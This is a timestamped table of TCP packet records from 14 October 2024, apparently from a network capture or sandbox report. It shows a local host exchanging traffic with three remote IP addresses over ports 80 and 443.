| Oct 14, 2024 09:12:10.404449940 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.404457092 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.404499054 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.405704975 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.405759096 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.408229113 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.408272982 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.408299923 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.408308983 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.408323050 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.408365011 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.409349918 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.409414053 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.412110090 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.412178040 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.412194014 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.412240982 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.412276030 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.412328005 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.413110018 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.413162947 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.416081905 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.416145086 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.416176081 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.416222095 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.416260004 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.416306973 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.416702032 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.416748047 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.419799089 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.419862032 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.419895887 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.419939995 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.419991970 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.420042992 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.420075893 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.420130968 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.423046112 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.423095942 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.423158884 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.423211098 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.423240900 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.423290968 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.424489975 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.424541950 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.426701069 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.426753044 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.426789999 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.426841974 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.445265055 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.445395947 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.445404053 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.445452929 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.445462942 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.445501089 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.445514917 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.445559025 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.445631027 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.445681095 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.445719004 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.445763111 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.445806980 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.445853949 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.445897102 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.445941925 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.445985079 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.446032047 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.446074009 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.446121931 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.446165085 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.446209908 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.446253061 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.446299076 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.446337938 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.446397066 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.446611881 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.446666002 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.446697950 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.446743965 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.446785927 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.446837902 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.446877003 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.446924925 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.446959972 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.447005987 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.447041035 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.447094917 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.447449923 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.447499037 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.447532892 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.447576046 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.447623014 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.447671890 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.447705984 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.447751999 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.447793007 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.447846889 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.447880983 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.447931051 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.448242903 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.448297977 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.448415041 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.448463917 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.448493958 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.448543072 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.453295946 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.453356981 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.453383923 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.453455925 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.453469038 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.453520060 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.453560114 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.453610897 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.453649998 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.453701019 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.453726053 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.453779936 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.458630085 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.458718061 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.458729982 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.458782911 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.458795071 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.458842993 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.458883047 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.458930969 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.459026098 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.459076881 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.459104061 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.459114075 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.459167004 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.970212936 CEST | 49744 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:10.975205898 CEST | 80 | 49744 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.978260040 CEST | 49744 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:10.978410959 CEST | 49744 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:10.983273029 CEST | 80 | 49744 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:11.444911003 CEST | 80 | 49744 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:11.449043036 CEST | 49744 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:11.454850912 CEST | 80 | 49744 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:11.559118032 CEST | 80 | 49744 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:11.601627111 CEST | 49744 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:11.993009090 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:11.993045092 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:11.993122101 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:11.995026112 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:11.995040894 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.468008995 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.468110085 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:12.522118092 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:12.522142887 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.523255110 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.570384026 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:12.587961912 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:12.635445118 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.695858002 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.695939064 CEST | 443 | 49750 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.696199894 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:12.759989023 CEST | 49750 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:12.768369913 CEST | 49744 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:12.773870945 CEST | 80 | 49744 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.878074884 CEST | 80 | 49744 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.882086039 CEST | 49756 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:12.882126093 CEST | 443 | 49756 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.882205963 CEST | 49756 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:12.882486105 CEST | 49756 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:12.882503033 CEST | 443 | 49756 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:12.929761887 CEST | 49744 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:13.357738972 CEST | 443 | 49756 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:13.359451056 CEST | 49756 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:13.359479904 CEST | 443 | 49756 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:13.508976936 CEST | 443 | 49756 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:13.509216070 CEST | 443 | 49756 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:13.509342909 CEST | 49756 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:13.509639025 CEST | 49756 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:13.512748003 CEST | 49744 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:13.513854027 CEST | 49762 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:13.518013000 CEST | 80 | 49744 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:13.518083096 CEST | 49744 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:13.518655062 CEST | 80 | 49762 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:13.518728018 CEST | 49762 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:13.518816948 CEST | 49762 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:13.523611069 CEST | 80 | 49762 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:14.017910004 CEST | 80 | 49762 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:14.019112110 CEST | 49768 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:14.019129038 CEST | 443 | 49768 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:14.019196033 CEST | 49768 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:14.019403934 CEST | 49768 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:14.019412041 CEST | 443 | 49768 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:14.070379972 CEST | 49762 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:14.495891094 CEST | 443 | 49768 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:14.497700930 CEST | 49768 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:14.497744083 CEST | 443 | 49768 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:14.647413969 CEST | 443 | 49768 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:14.647536039 CEST | 443 | 49768 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:14.647614002 CEST | 49768 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:14.648058891 CEST | 49768 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:14.652259111 CEST | 49770 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:14.657108068 CEST | 80 | 49770 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:14.657234907 CEST | 49770 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:14.657296896 CEST | 49770 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:14.662147999 CEST | 80 | 49770 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.151238918 CEST | 80 | 49770 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.152559042 CEST | 49775 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:15.152585983 CEST | 443 | 49775 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.152645111 CEST | 49775 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:15.152879000 CEST | 49775 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:15.152892113 CEST | 443 | 49775 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.195425034 CEST | 49770 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:15.650916100 CEST | 443 | 49775 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.652482033 CEST | 49775 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:15.652517080 CEST | 443 | 49775 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.772799969 CEST | 443 | 49775 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.773067951 CEST | 443 | 49775 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.773154974 CEST | 49775 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:15.773439884 CEST | 49775 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:15.776731968 CEST | 49770 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:15.777647972 CEST | 49781 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:15.784224033 CEST | 80 | 49781 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.784252882 CEST | 80 | 49770 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:15.784342051 CEST | 49770 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:15.784359932 CEST | 49781 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:15.784436941 CEST | 49781 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:15.790250063 CEST | 80 | 49781 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.258533001 CEST | 80 | 49781 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.260337114 CEST | 49783 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:16.260377884 CEST | 443 | 49783 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.260448933 CEST | 49783 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:16.261271000 CEST | 49783 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:16.261286020 CEST | 443 | 49783 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.304733992 CEST | 49781 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:16.774678946 CEST | 443 | 49783 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.779863119 CEST | 49783 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:16.779894114 CEST | 443 | 49783 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.929192066 CEST | 443 | 49783 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.929439068 CEST | 443 | 49783 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.929531097 CEST | 49783 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:16.930063009 CEST | 49783 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:16.934576035 CEST | 49788 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:16.934622049 CEST | 49781 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:16.939408064 CEST | 80 | 49788 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.939768076 CEST | 80 | 49781 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:16.939889908 CEST | 49781 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:16.940207005 CEST | 49788 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:16.940207005 CEST | 49788 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:16.944979906 CEST | 80 | 49788 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:17.414257050 CEST | 80 | 49788 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:17.415906906 CEST | 49794 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:17.415941000 CEST | 443 | 49794 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:17.416023016 CEST | 49794 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:17.416277885 CEST | 49794 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:17.416289091 CEST | 443 | 49794 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:17.461117029 CEST | 49788 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:17.901920080 CEST | 443 | 49794 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:17.903697014 CEST | 49794 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:17.903727055 CEST | 443 | 49794 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:18.040998936 CEST | 443 | 49794 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:18.041251898 CEST | 443 | 49794 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:18.041321993 CEST | 49794 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:18.041593075 CEST | 49794 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:18.044970989 CEST | 49788 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:18.045476913 CEST | 49800 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:18.050110102 CEST | 80 | 49788 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:18.050188065 CEST | 49788 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:18.050287008 CEST | 80 | 49800 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:18.050348043 CEST | 49800 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:18.050544977 CEST | 49800 | 80 | 192.168.2.4 | 193.122.130.0 |
| Oct 14, 2024 09:12:18.055418015 CEST | 80 | 49800 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:18.514950991 CEST | 80 | 49800 | 193.122.130.0 | 192.168.2.4 |
| Oct 14, 2024 09:12:18.516011953 CEST | 49802 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:18.516035080 CEST | 443 | 49802 | 188.114.96.3 | 192.168.2.4 |
| Oct 14, 2024 09:12:18.516108990 CEST | 49802 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:18.516325951 CEST | 49802 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 14, 2024 09:12:18.516338110 CEST | 443 | 49802 | 188.114.96.3 | 192.168.2.4 |
